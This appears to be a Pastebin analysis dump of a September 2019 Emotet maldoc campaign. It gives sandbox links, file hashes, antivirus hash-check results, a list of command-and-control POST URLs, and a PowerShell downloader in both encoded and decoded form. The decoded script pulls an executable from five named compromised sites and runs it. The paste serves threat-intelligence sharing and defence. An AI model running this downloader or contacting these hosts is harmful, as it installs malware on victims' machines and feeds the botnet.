Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Github repo with maldocs: https://github.com/bloomer1016/2019-09-18-Emotet/tree/master
- Any.Run results for some
- =========================
- https://app.any.run/tasks/5d921b3e-fc42-48fd-96b4-a0c84c6df7ca
- https://app.any.run/tasks/a95d5234-04a9-4a86-b284-3189e92fad31
- https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7
- Maldoc name and hashes
- =======================
- 844545613263975.doc = d0549a23f032dd31c0b4f6ce52dc2b68
- BL_4FGY5QJ54MQ.doc = 611e1f0d8d8b5ea6021b80c57521dd5f
- BL_B5HP885M08_HB.doc = 2792353f03a08766d5a8a5cfcdc11755
- Documents503562.doc = c23fef65dca1134add0911598e144962
- FT_GNVGZ8X52TM.doc = 11aeba89608c7a1c76c03124c0deb224
- FT_Q8I5N0EAY6.doc = 23709a5f4e852eb64e8cb16bef0b4af3
- LLC_6001165714_L_09182019.doc = 8264fee8922f4a49728da27c23915c04
- RE_A5V5YRMEMG7EEN_09182019.doc = e0ebff22ce0e5083669ed163017610a3
- SCANMR-35747.doc = b06323ecc2d3d3c7520adddcede27b23
- info-09_18_2019233916.doc = 890b71c6603640a7b6afb9a1aa2c4db9
- Munin results
- ==============
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Writing results to new file: check-results_attach.csv
- [ ] Processing /attach/FT_Q8I5N0EAY6.doc ...
- [ ] Processing /attach/SCANMR-35747.doc ...
- [ ] Processing /attach/LLC_6001165714_L_09182019.doc ...
- [ ] Processing /attach/info-09_18_2019233916.doc ...
- [ ] Processing /attach/BL_B5HP885M08_HB.doc ...
- [ ] Processing /attach/FT_GNVGZ8X52TM.doc ...
- [ ] Processing /attach/844545613263975.doc ...
- [ ] Processing /attach/RE_A5V5YRMEMG7EEN_09182019.doc ...
- [ ] Processing /attach/BL_4FGY5QJ54MQ.doc ...
- [ ] Processing /attach/Documents503562.doc ...
- [+] Processing 10 lines ...
- 1 / 10 > Unknown
- HASH: 19aafd3b374956bb8ed67f231e0bb5797143e23f37617e66784cb29c3c6a10dd COMMENT: /attach/FT_Q8I5N0EAY6.doc
- RESULT: - / -
- 2 / 10 > Malicious
- HASH: f4903ce8ea06e78db686bccd687857f7129f425cb03b79ac39ee6a7ad5567d2e COMMENT: /attach/SCANMR-35747.doc
- VIRUS: Microsoft: Trojan:Script/Conteban.A!ml / TrendMicro: HEUR_VBA.O2
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 19:50:41 COMMENTS: 0 USERS: -
- RESULT: 16 / 56
- 3 / 10 > Malicious
- HASH: 6dba64beab05a8cbbbb0c7ed465447c1ddd4484daa784737860f48b3c835336e COMMENT: /attach/LLC_6001165714_L_09182019.doc
- VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 19:11:50 COMMENTS: 0 USERS: -
- RESULT: 14 / 58
- 4 / 10 > Unknown
- HASH: 44193897b15e5b25abd4fdaec44923b9b44eef2d49b330934bc47f91d6a82107 COMMENT: /attach/info-09_18_2019233916.doc
- RESULT: - / -
- 5 / 10 > Unknown
- HASH: 7b2142363813a41fd3a512ca6bbd2e3d73d274558f58ca990d78a1537ebfcbd8 COMMENT: /attach/BL_B5HP885M08_HB.doc
- RESULT: - / -
- 6 / 10 > Malicious
- HASH: 4a89881dbe35b5b96414f7f258ce83bb65b908330a2d01a73a38996cf4766345 COMMENT: /attach/FT_GNVGZ8X52TM.doc
- VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:01:08 COMMENTS: 0 USERS: -
- RESULT: 14 / 56
- 7 / 10 > Unknown
- HASH: 5c39f7d201d031baea0aa681c8b159c59beaca86729cb6cbaaa1b3d30b7386ed COMMENT: /attach/844545613263975.doc
- RESULT: - / -
- 8 / 10 > Malicious
- HASH: 4b00391f7bbb49f146f425f7beb285222e26de316b87e4fd8e70e490015a1bec COMMENT: /attach/RE_A5V5YRMEMG7EEN_09182019.doc
- VIRUS: Microsoft: Trojan:Win32/Ludicrouz.O / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:09:01 COMMENTS: 0 USERS: -
- RESULT: 14 / 58
- 9 / 10 > Malicious
- HASH: e52d9448e78d875f07fc9cdbe18ebbf755a69b95aec37d147d0ce509de3e7c66 COMMENT: /attach/BL_4FGY5QJ54MQ.doc
- VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:03:11 COMMENTS: 0 USERS: -
- RESULT: 13 / 58
- 10 / 10 > Malicious
- HASH: 42f0de30c375368ea3c82c734129cf1902476f44404e4d7eaef3bfd5f1a1cf8a COMMENT: /attach/Documents503562.doc
- VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 17:33:40 COMMENTS: 0 USERS: -
- RESULT: 16 / 59
- PoSH encoded command
- =====================
- JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA==
- Decoded PoSH command
- ====================
- $Pai1Ui13='pATcSjl'
- $wiaYWE = '133'
- $jL_KnSZ2='dbtZD3ui'
- $G2wvAOC=$env:userprofile+'\'+$wiaYWE+'.exe'
- $z5EwO2v='szOGPK'
- $Q8kzjz0=&('new-obje'+'c'+'t') neT.weBclIEnT
- $nbLONdWV='https://www.patrickglobalusa.com/wp-admin/fSRkAFjqv/
- https://pipizhanzhang.com/wp-admin/3ciornz_iulayscz-679646/
- https://tankhoi.vn/wp-includes/XTSugzNaz/
- https://www.supercrystal.am/wp-admin/PdMInSgs/
- https://hotel-bristol.lu/dlry/MAnJIPnY/'."Sp`lit"('
- ')
- $QNBE_r9='O5Za1CU'
- foreach($S6f8RWR in $nbLONdWV){try{$Q8kzjz0."d`OW`NlOAD`FiLE"($S6f8RWR, $G2wvAOC)
- $pHL7wh='QLVVdP8'
- If ((.('Ge'+'t-'+'Item') $G2wvAOC)."LE`NGTH" -ge 28807) {[Diagnostics.Process]::"StA`RT"($G2wvAOC)
- $oS9MG93='E1Bu6jOX'
- break
- $TbfJaY='Bzpc_Zs'}}catch{}}$DmAOEN='mRbb1P38'
- C2's traffic
- =============
- POST http://190.18.146.70/mult/cookies/
- POST http://187.147.50.167:8080/entries/odbc/
- POST http://178.254.6.27:7080/ban/codec/sess/merge/
- POST http://92.222.125.16:7080/tpt/tpt/sess/
- POST http://142.44.162.209:8080/ringin/
- POST http://31.12.67.62:7080/arizona/
- POST http://45.123.3.54:443/pnp/
- POST http://201.250.11.236:50000/codec/
- POST http://41.220.119.246/jit/
- POST http://86.98.25.30:53/arizona/
- POST http://37.157.194.134:443/teapot/
- POST http://187.144.189.58:50000/codec/
- POST http://189.209.217.49/jit/
- POST http://31.172.240.91:8080/arizona/
- POST http://104.131.11.150:8080/teapot/
- POST http://59.152.93.46:443/site/
- POST http://222.214.218.192:8080/arizona/
- POST http://162.243.125.212:8080/teapot/
- POST http://169.239.182.217:8080/site/
- POST http://85.104.59.244:20/xian/
- POST http://95.128.43.213:8080/arizona/
- POST http://91.92.191.134:8080/site/
- POST http://144.139.247.220/xian/
- POST http://87.230.19.21:8080/loadan/
- POST http://117.197.124.36:443/teapot/
- POST http://173.212.203.26:8080/site/
- POST http://206.189.98.125:8080/xian/
- POST http://45.33.49.124:443/loadan/
- POST http://62.75.187.192:8080/codec/iplk/sess/merge/
- POST http://136.243.177.26:8080/iplk/psec/sess/
- POST http://91.205.215.66:8080/usbccid/badge/
- POST http://186.4.172.5:443/iplk/balloon/sess/
- POST http://185.129.92.210:7080/vermont/
- POST http://182.176.132.213:8090/report/
- POST http://87.106.139.101:8080/child/
- POST http://87.106.136.232:8080/dma/
- POST http://188.166.253.46:8080/iplk/
- POST http://37.208.39.59:7080/child/
- POST http://185.94.252.13:443/attrib/merge/sess/
- POST http://175.100.138.82:22/pdf/sym/
- POST http://78.24.219.147:8080/attrib/bml/sess/
- POST http://201.212.57.109/pnp/
- POST http://217.160.182.191:8080/entries/
- POST http://186.4.172.5:8080/forced/
- POST http://138.201.140.110:8080/mult/
- POST http://182.76.6.2:8080/health/
- POST http://190.145.67.134:8090/acquire/
- POST http://47.41.213.2:22/entries/
- POST http://159.65.25.128:8080/forced/
- POST http://75.127.14.170:8080/ringin/
- POST http://190.201.164.223:53/mult/
- POST http://94.205.247.10/health/
- POST http://177.246.193.139:20/entries/
- POST http://149.202.153.252:8080/forced/
- POST http://88.156.97.210/ringin/
- POST http://178.79.161.166:443/mult/
- POST http://46.105.131.87/health/
- POST http://211.63.71.72:8080/cab/prep/sess/
- POST http://179.32.19.219:22/enable/publish/sess/merge/
- POST http://190.186.203.55/arizona/iab/sess/merge/
- POST http://104.236.246.93:8080/publish/schema/sess/
- POST http://92.222.216.44:8080/psec/
- POST http://212.71.234.16:8080/raster/
- POST http://182.176.106.43:995/entries/
- POST http://190.18.146.70/sess/
- POST http://187.147.50.167:8080/enable/
- POST http://178.254.6.27:7080/raster/
- POST http://92.222.125.16:7080/entries/
- POST http://142.44.162.209:8080/tlb/
- POST http://31.12.67.62:7080/sess/
- POST http://45.123.3.54:443/enable/
- POST http://201.250.11.236:50000/health/
- POST http://41.220.119.246/raster/
- POST http://86.98.25.30:53/glitch/
- POST http://37.157.194.134:443/tlb/
- POST http://187.144.189.58:50000/sess/
- POST http://189.209.217.49/enable/
- POST http://31.172.240.91:8080/health/
- POST http://104.131.11.150:8080/raster/
- POST http://59.152.93.46:443/glitch/
- POST http://222.214.218.192:8080/sess/
- POST http://162.243.125.212:8080/enable/
- POST http://169.239.182.217:8080/codec/
- POST http://85.104.59.244:20/raster/
- POST http://95.128.43.213:8080/glitch/
- POST http://91.92.191.134:8080/srvc/
- POST http://144.139.247.220/enable/
- POST http://87.230.19.21:8080/codec/
- POST http://117.197.124.36:443/scripts/
- POST http://173.212.203.26:8080/glitch/
- POST http://206.189.98.125:8080/arizona/
- POST http://45.33.49.124:443/srvc/
- POST http://62.75.187.192:8080/schema/arizona/ringin/merge/
- POST http://136.243.177.26:8080/devices/loadan/ringin/
- POST http://91.205.215.66:8080/devices/free/
- POST http://186.4.172.5:443/prep/jit/ringin/
- POST http://185.129.92.210:7080/json/add/ringin/merge/
- POST http://182.176.132.213:8090/mult/stubs/
- POST http://87.106.139.101:8080/acquire/ringin/ringin/merge/
- POST http://87.106.136.232:8080/xian/prep/ringin/merge/
- POST http://188.166.253.46:8080/raster/publish/ringin/
- POST http://37.208.39.59:7080/vermont/
- POST http://185.94.252.13:443/iab/
- POST http://175.100.138.82:22/between/
- POST http://78.24.219.147:8080/enabled/
- POST http://201.212.57.109/vermont/
- POST http://217.160.182.191:8080/iab/
- POST http://186.4.172.5:8080/between/
- POST http://138.201.140.110:8080/vermont/
- POST http://182.76.6.2:8080/iab/
- POST http://190.145.67.134:8090/between/
- POST http://47.41.213.2:22/enabled/
- POST http://159.65.25.128:8080/vermont/
- POST http://75.127.14.170:8080/schema/
- POST http://190.201.164.223:53/between/
- POST http://94.205.247.10/enabled/
- POST http://177.246.193.139:20/schema/
- POST http://149.202.153.252:8080/between/
- POST http://88.156.97.210/sym/
- POST http://178.79.161.166:443/prov/
- POST http://46.105.131.87/schema/
- POST http://211.63.71.72:8080/between/
- POST http://179.32.19.219:22/sym/
- POST http://190.186.203.55/prov/
- POST http://104.236.246.93:8080/publish/free/ringin/merge/
- POST http://92.222.216.44:8080/pnp/add/
- POST http://212.71.234.16:8080/attrib/stubs/ringin/merge/
- POST http://182.176.106.43:995/enable/ringin/ringin/merge/
- POST http://190.18.146.70/taskbar/
- POST http://187.147.50.167:8080/ban/schema/ringin/
- POST http://178.254.6.27:7080/walk/prov/ringin/
- POST http://92.222.125.16:7080/codec/
- POST http://142.44.162.209:8080/ringin/
- POST http://31.12.67.62:7080/add/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement